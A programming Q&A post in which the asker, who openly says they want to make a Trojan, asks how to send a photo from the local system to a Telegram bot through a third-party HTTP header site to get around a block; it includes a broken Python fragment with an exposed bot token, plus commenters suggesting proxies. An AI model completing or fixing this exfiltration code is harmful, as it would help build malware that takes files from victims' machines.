# How to send photos in Telegram robot through third party site

Tags: python, bots, telegram

Unfortunately, Telegram is blocked in my country. I wanted to send a photo of the local system to bot Telegram via https://www.httpdebugger.com/tools/ViewHttpHeaders.aspx. Please help me

I want to make a Trojan. Using Proxy is not logical because it is disabled

This is the result of my efforts

```
import requests
url="https://api.telegram.org/bot1186165009:AAFtYAIpg83i433Uz0QLohOCZwgVOeuPL0k/sendPhoto?chat_id=488798021photo="+open("ax.png","rb")

pyload={"UrlBox":url,
        "AgentList":"Mozilla Firefox",
        "VersionsList":"HTTP/1.1",
        "MethodList":"POST",
        }      
requests.post("https://www.httpdebugger.com/Tools/ViewHttpHeaders.aspx",pyload)
```

But it doesn't work

Comment: did you try to connect with Telegram using any proxy server ? ie.https://free-proxy-list.net/

Comment: if you want to work with this page then use module `requests` and send it as POST data `requests.post(...)` But it works similar to proxy server so maybe try with real proxy servers.

Comment: "*I want to make a Trojan*"... er...